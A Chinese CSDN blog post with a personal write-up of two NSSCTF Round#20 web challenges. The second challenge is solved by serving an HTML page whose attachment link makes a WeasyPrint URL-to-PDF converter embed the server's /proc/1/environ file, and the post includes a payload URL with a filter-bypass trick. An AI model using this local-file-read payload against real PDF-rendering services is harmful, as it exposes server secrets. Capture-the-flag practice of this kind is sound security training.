【Web】NSSCTF Round#20 Basic 个人wp

于 2024-03-30 19:32:17 发布
阅读量1k 收藏 8
点赞数 27
文章标签: nssctf web ctf wp NSSCTF Round#20 binwalk nss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/137179131
版权
文章讲述了在CSDN博客的URLTOPDF挑战中,作者通过信息搜集发现一个/flag路径,利用WeasyPrint将HTML转换为PDF的漏洞,最终成功获取旗标的过程。
摘要由CSDN通过智能技术生成

目录

前言

真亦假,假亦真

CSDN_To_PDF V1.2

前言

感谢17👴没让我爆零

真亦假,假亦真

直接getshell不行,那就一波信息搜集呗,先开dirsearch扫一下

扫的过程中先试试常规的robots.txt,www.zip,shell.phps,.git,.svn,还有抓包看响应头响应体,均无果,最后扫出来是个/flag,乐

愉快地访问/flag即可 

CSDN_To_PDF V1.2

参考题目:[BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客

先随便试试

http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668

成功收到请求,注意到UA是WeasyPrint 

WeasyPrint是一个开源的HTML/CSS到PDF转换工具,它允许用户使用标准的Web技术(HTML和CSS)创建PDF文档。WeasyPrint能够解析HTML和CSS,并将其转换为可打印的PDF格式,支持诸如排版、布局、字体处理等功能。它是一个功能强大且灵活的工具,常用于生成报告、文档、电子书等需要打印或分享的内容。WeasyPrint是基于Python开发的,并且可以通过命令行或Python API进行使用。 

 vps上挂1.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///proc/1/environ">
</body>
</html>

payload:

http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668

下载拿到ouput.pdf,但是直接打开是不行的

 

用binwalk来打开文件

拿到flag 

Z3r4y
关注
NSSCTF-极客大挑战2020-web-wp
F1rstb100d
09-21 658
NSSCTF-极客大挑战2020-web-wp
WebNSSCTF Round#20 Basic 两道0解题的赛后谈
uuzeray的博客
03-31 1596
本想着说看看go的gin框架就睡了的,r3师傅提醒说赛题环境已经上了,那不赶紧研究下😀主要来谈谈做题的心路历程。
WebNSSCTF Round#18 Basic个人wp(部分)
uuzeray的博客
02-14 1710
不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可。我们就按示例传一下(必须以http://开头,否则不能解析为图片)尝试传了发现不能起作用跳转,估计是这些被html实体化了。链接是插入到了src中,我们可以直接用">闭合img标签。从评论区知道,要让门酱玩元梦之星,考虑直接。那咋整呢,题目里还提供了评论插入图片功能。把这个链接给门酱即可获得flag。成功重定向到元梦之星官网。先试一下随便给个链接。获得该条恶意评论链接。
WebNSSCTF Round#17 Basic个人wp(全)
uuzeray的博客
01-28 1497
题目作为小练手还行,具体细节不必较劲。
NSSCTF Round#17 RE snake WP
Pisces50002的博客
01-28 623
F8慢慢往下走,第二个cmp,为了防止它跳转回去,把ZF改成1直接往下走(jnz指令表示“当零标志位(ZF)为0时跳转”)联系到朝雾老师教的打飞机hit-plane那一题,应该通过控制流劫持直接跳转到打印flag的地方。之后可以看到fmt_Fprintf应该是打印flag的位置,下个断点直接F9。控制流劫持可以非常快,当时困在中间的循环里了,其实一直跳到最后就行……第一个cmp分支处,判断轮数,我选择直接改rax的值。一路F8,这里打印了个success!运行一下发现是个贪吃蛇。
NSSCTF Round#18 Basic——Number 7
ASD830的博客
02-14 455
题目描述:一眼丁真,Cisco Type7解码。
NSSCTF Round#20 Basic 真亦假,假亦真 CSDN_To_PDF V1.2 出题笔记 (附wp+源码)
Jay17的博客
03-30 1811
NSSCTF Round#20 Basic 真亦假,假亦真 CSDN_To_PDF V1.2 出题笔记 (附wp+源码)
WebNSSCTF Round#16 Basic个人wp(全)
uuzeray的博客
01-13 1856
出题友好,适合手生复健。
NSSCTF Round#18 RE GenshinWishSimulator WP
Pisces50002的博客
02-14 849
恶搞原神抽卡模拟器Unity逆向,根据经验应该dnspy查看Assembly-CSharp.dll上来看到SM4Gacha是抽卡的意思,这里应该是抽卡的主逻辑Gift内可以看到主要逻辑,以array作为key为偏移(IV),用模式加密input数组,最后保存字符串到flag对象里也就是说如果静态分析直接求flag就是一个SM4_CBC的解密过程,检查一下发现SM4没有经过魔改,应该容易解出。
Codeforces Beta Round #11 D. A Simple Task
09-07 2930
题意:有N(最多19个)个点,M条边,问有多少个简单环。 状态压缩,dp[st][i],终点是i,st表示这个环走过哪几个,定义起点为这些走过的点里最小的。 #pragma comment(linker, "/STACK:102400000,102400000") #include #include #include #include #include #include #incl
Codeforces Round #149 (Div. 2) E. XOR on Segment
热门推荐
蛤蛤~
11-12 1万+
题意         给你 n(1                 1、 1 L R :询问区间 [L, R] 中所有数的和,并输出                 2、 2 L R XOR :把区间 [L, R] 中的每个数换成原数与 XOR 异或得到的新数 做法分析         典型的线段树,这里需要运用异或运算的一个性质:                 a^b 得到
由 BigDecimal 舍入算法引发的血案:ROUND_HALF_UP 与 ROUND_UP
Java Punk
08-23 4678
ROUND_HALF_UP:根据保留数字后一位进行四舍五入( >=5 进位)
Codeforces Round #463 (Div. 1 + Div. 2, combined) G:Palindrome Partition(回文自动机)
DZYO的博客
02-17 6046
传送门 题解: 这是一道神题,具体题解直接看官方的比较好… 用到了策爷字符串ppt中回文串的回文后缀是lognlog⁡n\log n个等差数列的性质。 #include &lt;bits/stdc++.h&gt; using namespace std; const int N=1e6+50; const int mod=1e9+7; int n,f[N],tot=1; char s[N]...
循环荷载三轴 pfc5.0 PFC5.0
10-06
循环荷载三轴 pfc5.0 PFC5.0
光伏储能同步发电机simulink仿真模型 主电路:三相全桥逆变 直流侧电压800V 光伏模块:光伏板结合Boost电路应用MP
10-06
光伏储能同步发电机simulink仿真模型 主电路:三相全桥逆变 直流侧电压800V 光伏模块:光伏板结合Boost电路应用MPPT 储能模块:采用双闭环控制,外环直流母线电容稳压,内环为电池电流环控制 Matlab simulink 2021b及以上版本 仿真结果: 1.VSG仿真输出的功率可以无静差跟踪给定参考值 2.直流母线电容电压可以实现稳压功能,稳定时可以跟踪给定参考电压值 3.光伏模块MPPT算法输出最大功率波动很小,波形完美 4.在1s的时候给定直流母线电压参考值由800降为700V,可看到能够很好跟踪给定参考电压值 VSG输出电压电流THD都低于1%
深入剖析Oracle与MySQL在数据安全性方面的差异
10-06
数据库的安全性是任何依赖数据库存储敏感信息的组织最关心的问题之一。Oracle和MySQL作为两个主流的数据库管理系统,在数据安全性方面各有所长。本文将深入探讨Oracle与MySQL在数据安全性方面的差异,包括它们提供的安全性特性、最佳实践以及代码示例。 Oracle和MySQL在数据安全性方面都提供了强大的功能,但它们在特性和方法上存在差异。Oracle的安全性特性更为全面和高级,适合对安全性要求极高的企业级应用。MySQL则提供了基本的安全性功能,适合中小型项目和Web应用。了解这些差异有助于开发者在不同数据库系统间进行数据迁移或开发数据库应用程序时做出正确的选择。通过本文的分析和代码示例,读者应该能够更好地理解Oracle与MySQL在数据安全性方面的差异,并在实际开发中做出合适的选择。
深圳大学校园网自动登录脚本,适用于使用Drom客户端的校园网登录验证系统。对配置文件中的密码进行加密.zip
最新发布
10-06
项目学习分享。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【技术】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
MATLAB直线倒立摆一阶倒立摆LQR控制仿真,小车倒立摆起摆和平衡控制,附带参考文献 三种控制方法对比 pd控制、lqr控制、
10-06
MATLAB直线倒立摆一阶倒立摆LQR控制仿真,小车倒立摆起摆和平衡控制,附带参考文献 三种控制方法对比 pd控制、lqr控制、mpc模型预测控制
codeforces round #729
03-16
Codeforces Round #729 是 Codeforces 的一个比赛,于2021年8月29日举行。这是一个由 Codeforces 组织的在线编程竞赛,参赛者需要在规定时间内解决一系列算法问题。比赛难度分为 A、B、C、D、E、F 六个等级,参赛者需要根据自己的实力选择适合自己的难度等级进行挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值